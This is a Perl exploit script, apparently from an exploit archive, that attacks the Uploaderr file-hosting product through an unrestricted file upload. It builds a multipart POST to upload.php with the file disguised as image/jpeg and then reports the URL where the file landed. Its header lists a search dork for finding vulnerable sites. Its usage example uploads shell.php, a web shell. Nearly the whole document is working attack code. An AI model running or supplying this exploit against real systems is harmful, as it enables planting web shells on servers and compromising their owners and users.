#!/usr/bin/perl
#################################################################
#Title:       Uploaderr Remote Arbitrary File Upload Exploit    #
#                                                               #
#Credit:      r3dm0v3                                           #
#             http://r3dm0v3.persianblog.ir                     #
#             r3dm0v3[4t]yahoo[dot]com                          #
#             Tehran - Iran                                     #
#                                                               #
#Vendor:      http://www.uploaderr.com/                         #
#Price:       9.95$                                             #
#Remote:      Yes                                               #
#Dork:        "Powered by Uploaderr"                            #
#Fix:         Not Available                                     #
#                                                               #
#Special thx: Neo limpizik_neo[4t]yahoo[dot]com                 # 
#################################################################

$maxfilesize=250000;
$port=80;

use IO::Socket;

&Banner();

if (@ARGV < 2) {
  &Usage();
  exit(1);
}

$path = $ARGV[0];
if (substr($path,length($path)-1,1) ne "/"){
  $path.="/";
} 

$url=$path;
if (lc($url)=~/http:\/\//){
  lc($url) =~ /http:\/\/([a-zA-Z0-9.\/_-]+)/;
  $url= $1;
}
else{
  $url =~ /([a-zA-Z0-9.\/_-]+)/;
  $url= $1;
}
$url =~ /([a-zA-Z0-9-_.]+)/;
$host=$1;
$url=~s/$host//;
$file=$ARGV[1];

print "[+] Connecting to $host\n";

open(FILETOUPLOAD,$file) || die "Can not open the file: $!\n";
@filecontent=<FILETOUPLOAD>;
close(FILETOUPLOAD);

$content="-----------------------------7d92ce322fc0564\n".
         "Content-Disposition: form-data; name=\"MAX_FILE_SIZE\"\n\n".
         $maxfilesize."\n".
         "-----------------------------7d92ce322fc0564\n".
         "Content-Disposition: form-data; name=\"userfile\"; filename=\"".$file."\"\n".
         "Content-Type: image/jpeg\n\n".
         "@filecontent\n".
         "-----------------------------7d92ce322fc0564\n".
         "Content-Disposition: form-data; name=\"upload\"\n\n".
         "true\n".
         "-----------------------------7d92ce322fc0564\n".
         "Content-Disposition: form-data; name=\"submitbutton\"\n\n\n".
         "-----------------------------7d92ce322fc0564--\n";
$req="POST ".$url."upload.php HTTP/1.1\n".
     "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\n".
     "Content-Type: multipart/form-data; boundary=---------------------------7d92ce322fc0564\n".
     "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\n".
     "Host: ".$host."\n".
     "Content-Length: ".length($content)."\n".
     "Connection: Close\n".
     "Cache-Control: no-cache\n\n".
     $content;

$connect = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => "tcp") || die "Cannot connect to $host: $!\n";
print $connect $req;
while (<$connect>) {
$response.=$_;
}

$response=~ /.+input onclick="javascript:this\.select\(\);" type="text" value="([a-zA-Z0-9.\/:_-]+)" readonly.+/;
$uploadedFile=$1;
if ($uploadedFile){
  print "[+] File uploaded: ".$uploadedFile."\n";
}else{
  print "[!] Failed.\n";
}


sub Banner{
print "############################################################\n".
      "#     Uploaderr Remote Arbitrary File Upload Exploit       #\n".
      "#                       by r3dm0v3                         #\n".
      "#                  r3dm0v3[4t]yahoo[.]com                  #\n".
      "#               http://r3dm0v3.persianblog.ir              #\n".
      "############################################################\n";
}

sub Usage(){
print "\n Usage: uploaderr.pl <host&path> <local_file>\n";
print " ex.  : uploaderr.pl site.com/upload/ shell.php\n";
}